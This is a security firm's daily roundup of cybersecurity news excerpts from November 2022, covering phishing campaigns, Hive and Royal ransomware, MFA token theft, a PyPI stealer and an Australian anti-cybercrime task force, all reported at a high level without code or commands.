November 18, 2022

Fortify Security Team
Nov 18, 2022

Title: Phishing Kit Impersonates Well-Known Brands to Target Us Shoppers
Date Published: November 17, 2022

Excerpt: “A sophisticated phishing kit has been targeting North Americans since mid-September, using lures focused on holidays like Labor Day and Halloween. The kit uses multiple evasion detection techniques and incorporates several mechanisms to keep non-victims away from its phishing pages. According to Akamai, whose security researchers discovered the campaign, one of the most interesting features of the kit is a token-based system that ensures each victim is redirected to a unique phishing page URL. The campaign spotted by Akamai started in September 2022 and continued throughout October, preying on online shoppers looking for “holiday specials.” The central theme of the phishing emails sent to prospective victims is a chance to win a prize from a reputable brand. The links in the email don’t raise any alarms as they lead to the phishing site after a series of redirections, while URL shorteners conceal most URLs.”

Title: Hive Ransomware Extorted Over $100M in Ransom Payments From Over 1,300 Companies
Date Published: November 18, 2022

Excerpt: “Hive ransomware operators have extorted over $100 million in ransom payments from over 1,300 companies worldwide as of November 2022. The threat actors behind the Hive ransomware-as-a-service (RaaS) have extorted $100 million in ransom payments from over 1,300 companies worldwide as of November 2022, reported the U.S. cybersecurity and intelligence authorities. “As of November 2022, Hive ransomware actors have victimized over 1,300 companies worldwide, receiving approximately US$100 million in ransom payments” reads the alert published by CISA. The authorities reported that from June 2021 through at least November 2022, threat actors employed the Hive ransomware in attacks aimed at a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH). The Hive ransomware operation has been active since June 2021, it provides Ransomware-as-a-Service Hive and adopts a double-extortion model threatening to publish data stolen from the victims on their leak site (HiveLeaks). In April 2021, the Federal Bureau of Investigation (FBI) released a flash alert on the Hive ransomware attacks that includes technical details and indicators of compromise associated with the operations of the gang. According to a report published by blockchain analytics company Chainalysis, the Hive ransomware is one of the top 10 ransomware strains by revenue in 2021. The group used various attack methods, including malspam campaigns, vulnerable RDP servers, and compromised VPN credentials.”

Title: Microsoft: Hackers Are Using This ‘Concerning’ Tactic to Dodge Multi-Factor Authentication
Date Published: November 18, 2022

Excerpt: “Microsoft says token theft attacks are on the rise. Here’s what you need to do to protect yourself. Microsoft has outlined several mitigations to protect against attacks on multi-factor authentication that will unfortunately make life more difficult for your remote workers. Three years ago, attacks on multi-factor authentication (MFA) were so rare that Microsoft didn’t have decent statistics on them, largely because few organizations had enabled MFA. But with MFA use rising as attacks on passwords become more common, Microsoft has seen an increase in attackers using token theft in their attempts to sidestep MFA. In these attacks, the attacker compromises a token issued to someone who’s already completed MFA and replays that token to gain access from a different device. Tokens are central to OAuth 2.0 identity platforms, including Azure Active Directory (AD), which aim to make authentication simpler and faster for users, but in a way that’s still resilient to password attacks.”

Title: Netflix Phishing Emails Surge 78%
Date Published: November 18, 2022

Excerpt: “Security researchers are warning that corporate accounts could be at risk after noting a 78% increase in email impersonation attacks spoofing the Netflix brand since October. If employees use the same credentials for personal accounts like Netflix as their work accounts, campaigns like this may imperil corporate systems and data, warned Egress. The group behind this particular campaign is using Unicode characters to bypass natural language processing (NLP) scanning in traditional anti-phishing filters, the security vendor claimed. “Unicode helps to convert international languages within browsers – but it can also be used for visual spoofing by exploiting international language characters to make a fake URL look legitimate,” Egress wrote. “For example, you could register a phishing domain as ‘xn–,’ which would be translated by a browser to ‘?’ This is known as a homograph attack.” Unicode is also used in the sender display names, such as “Netflix” and “help desk.” However, the threat actors didn’t stop there. “Other obfuscation techniques include trying to break up the text with non-identifiable characters, white on white text, and using characters from different languages to break the NLP’s perception as much as possible,” the vendor continued. “For example, using two V characters next to one another will be read as two Vs by a machine. But to a person skim-reading, VV looks a lot like W.” Alongside these techniques, the phishers use classic social engineering tactics, such as rushing the user into action and piggy-backing on current events – in this case Netflix’s introduction of a new ad-tier package.”

Title: Instagram Impersonators Target Thousands, Slipping by Microsoft’s Cybersecurity
Date Published: November 17, 2022

Excerpt: “The socially engineered campaign used a legitimate domain to send phishing emails to large swaths of university targets. Cyber Attackers have targeted students at national educational institutions in the US with a sophisticated phishing campaign that impersonated Instagram. The unusual aspect of the gambit is that they used a valid domain in an effort to steal credentials, bypassing both Microsoft 365 and Exchange email protections in the process. The socially engineered attack, which has targeted nearly 22,000 mailboxes, used the personalized handles of Instagram users in messages informing would-be victims that there was an “unusual login” on their account, according to a blog post published on Nov. 17 by Armorblox Research Team. The login lure is nothing new for phishers. But attackers also sent the messages from a valid email domain, making it much harder for both users and email-scanning technology to flag messages as fraudulent, the researchers said.”

Title: Transportation Sector Targeted by Both Ransomware and APTs
Date Published: November 18, 2022

Excerpt: “Trellix released The Threat Report: Fall 2022 from its Advanced Research Center, which analyzes cybersecurity trends from the third quarter (Q3) of 2022.The report includes evidence of malicious activity linked to ransomware and nation-state backed advanced persistent threat (APT) actors. It examines malicious cyber activity including threats to email, the malicious use of legitimate third-party security tools, and more.
Q3 cybersecurity trends:

  • US ransomware activity leads the pack: In the US alone, ransomware activity increased 100% quarter over quarter in transportation and shipping. Globally, transportation was the second most active sector (following telecom). APTs were also detected in transportation more than in any other sector.
  • Germany saw the highest detections: Not only did Germany generate the most threat detections related to APT actors in Q3 (29% of observed activity), but they also had the most ransomware detections. Ransomware detections rose 32% in Germany in Q3 and generated 27% of global activity.
  • Emerging threat actors scaled: The China-linked threat actor, Mustang Panda, had the most detected threat indicators in Q3, followed by Russian-linked APT29 and Pakistan-linked APT36.
  • Ransomware evolved: Phobos, a ransomware sold as a complete kit in the cybercriminal underground, has avoided public reports until now. It accounted for 10% of global detected activity and was the second most used ransomware detected in the US. LockBit continued to be the most detected ransomware globally, generating 22% of detections.
  • Old vulnerabilities continued to prevail: Years-old vulnerabilities continue to be successful exploitation vectors. Trellix observed Microsoft Equation Editor vulnerabilities comprised by CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802 to be the most exploited among malicious emails received by customers during Q3.
  • Malicious use of Cobalt Strike: Trellix saw Cobalt Strike used in 33% of observed global ransomware activity and in 18% of APT detections in Q3. Cobalt Strike, a legitimate third-party tool created to emulate attack scenarios to improve security operations, is a favorite tool of attackers who repurpose its capabilities for malicious intent.”

Title: Google Search Results Poisoned With Torrent Sites via Data Studio
Date Published: November 18, 2022

Excerpt: “Threat actors are abusing Google’s Looker Studio (formerly Google Data Studio) to boost search engine rankings for their illicit websites that promote spam, torrents, and pirated content. The SEO poisoning attack analyzed by BleepingComputer uses Google’s subdomain to lend credibility to malicious domains. BleepingComputer has come across several pages of Google search results flooded with links after a concerned reader reported seeing the erratic behavior to us. These links, rather than representing a legitimate Google Data Studio project, are minisites that host links to pirated content. For example, one such search result we clicked on, directs users looking to “Download Terrifier 2 (2022)” to links that further redirect multiple times to ultimately land on a spammy website.”

Title: Ongoing Supply Chain Attack Targets Python Developers With WASP Stealer
Date Published: November 18, 2022

Excerpt: “A threat actor tracked as WASP is behind an ongoing supply chain attack targeting Python developers with the WASP Stealer. Checkmarx researchers uncovered an ongoing supply chain attack conducted by a threat actor they tracked as WASP that is targeting Python developers. The attackers are using Python packages to distribute a polymorphic malware called W4SP Stealer. The malicious code is able to steal the victim’s Discord accounts, passwords, crypto wallets, credit cards, and other sensitive data on the victim’s PC. Stolen data has been sent back to the attacker through a hard-coded Discord webhook address. The threat actor is offering the WASP stealer for $20 claiming it is undetectable and is heavily “protected by some awesome obfuscation.” The supply chain attacks seem to be financially motivated. Checkmarx investigation started from recent reports from Phylum and Check Point, which spotted tens of PyPI packages delivering the W4SP stealer to developers’ systems.”

Title: Emerging Threat Actor DEV-0569 Expands Its Toolkit to Deliver Royal Ransomware
Date Published: November 18, 2022

Excerpt: “DEV-0569, a new threat actor whose activity can be traced back as early as August 2022, developed new tools to deliver the Royal ransomware, claimed Microsoft Security Threat Intelligence in a post published on November 17, 2022. This emerging group, for which Microsoft still uses a temporary ‘DEV-####’ designation, meaning they are unsure about its origin or identity, typically relies on malvertising and phishing link vectors. They point to a malware downloader called BATLOADER, posing as legitimate software installers such as TeamViewer, Adobe Flash Player and Zoom, or updates embedded in spam emails, fake forum pages, and blog comments to deploy the Royal ransomware, which first emerged in September 2022 and is being distributed by multiple threat actors. When launched, BATLOADER uses MSI Custom Actions to launch malicious PowerShell activity or run batch scripts to aid in disabling security solutions and lead to the delivery of various encrypted malware payloads that are decrypted and launched with PowerShell commands. From September 2022, Microsoft noticed that DEV-0569 started using contact forms to deliver its payloads. In one particular campaign, DEV-0569 sent a message to targets using the contact form on these targets’ websites, posing as a national financial authority. When a contacted target responds via email, DEV-0569 replies with a message that contains a link to BATLOADER. This method has been seen in other campaigns, including IcedID malware, notably used by the Emotet group. Microsoft also noticed that, from September, DEV-0569 started hosting fake installer files on legitimate-looking software download sites and legitimate repositories to make malicious downloads look authentic to targets, and an expansion of their malvertising technique by using Google Ads in regular campaigns, effectively blending in with normal ad traffic.”

Title: Australia Unveils Plan to Counter Global Cybercrime Problem
Date Published: November 17, 2022

Excerpt: “Following a spate of cyberattacks and data breaches affecting millions of Australians, the government‘s cybersecurity minister this week announced the formation of a task force that will hunt down hackers and said she is contemplating a ban on ransomware payments. Australia Cyber Security Minister Clare O’Neil announced the formation of the Joint Standing Operation task force, which brings together experts from the Australian Federal Police and the Australian Signals Directorate. The task force merges domestic police and foreign intelligence resources to provide assistance to victims and also to take down international cybercriminals. The Joint Standing Operation will “investigate, target and disrupt cybercriminal syndicates with a priority on ransomware threat groups,” according to a joint news release. On Saturday, O’Neil reiterated that this task force is a way of “Australia standing up and punching back.” “What they will do is scour the world and hunt down the criminal syndicates and gangs who are targeting Australia in cyberattacks and disrupt their efforts,” whether they’re in Russia or other countries, O’Neil announced on Twitter.”

Recent Posts

December 9, 2022

Title: US Health Dept Warns of Royal Ransomware Targeting Healthcare Date Published: December 8, 2022 Excerpt: “The U.S. Department of Health and Human...

December 8, 2022

Title: New ‘Zombinder’ Platform Binds Android Malware With Legitimate Apps Date Published: December 8, 2022 Excerpt: “A darknet platform dubbed...

December 7, 2022

Title: Fantasy – A New Agrius Wiper Deployed Through a Supply-Chain Attack Date Published: December 7, 2022 Excerpt: “ESET researchers discovered a new wiper and its execution...

December 6, 2022

Title: This Badly Made Ransomware Can’t Decrypt Your Files, Even if You Pay the Ransom Date Published: December 6, 2022 Excerpt: “Victims of a recently...

December 5, 2022

Title: SIM Swapper Gets 18-Months for Involvement in $22 Million Crypto Heist Date Published: December 3, 2022 Excerpt: “Florida man Nicholas Truglia...

December 2, 2022

Title: New Go-Based Redigo Malware Targets Redis Servers Date Published: December 1, 2022 Excerpt: “Redigo is a new Go-based malware employed in attacks against Redis servers...

December 1, 2022

Title: Keralty Ransomware Attack Impacts Colombia’s Health Care System Date Published: November 30, 2022 Excerpt: “The Keralty multinational healthcare...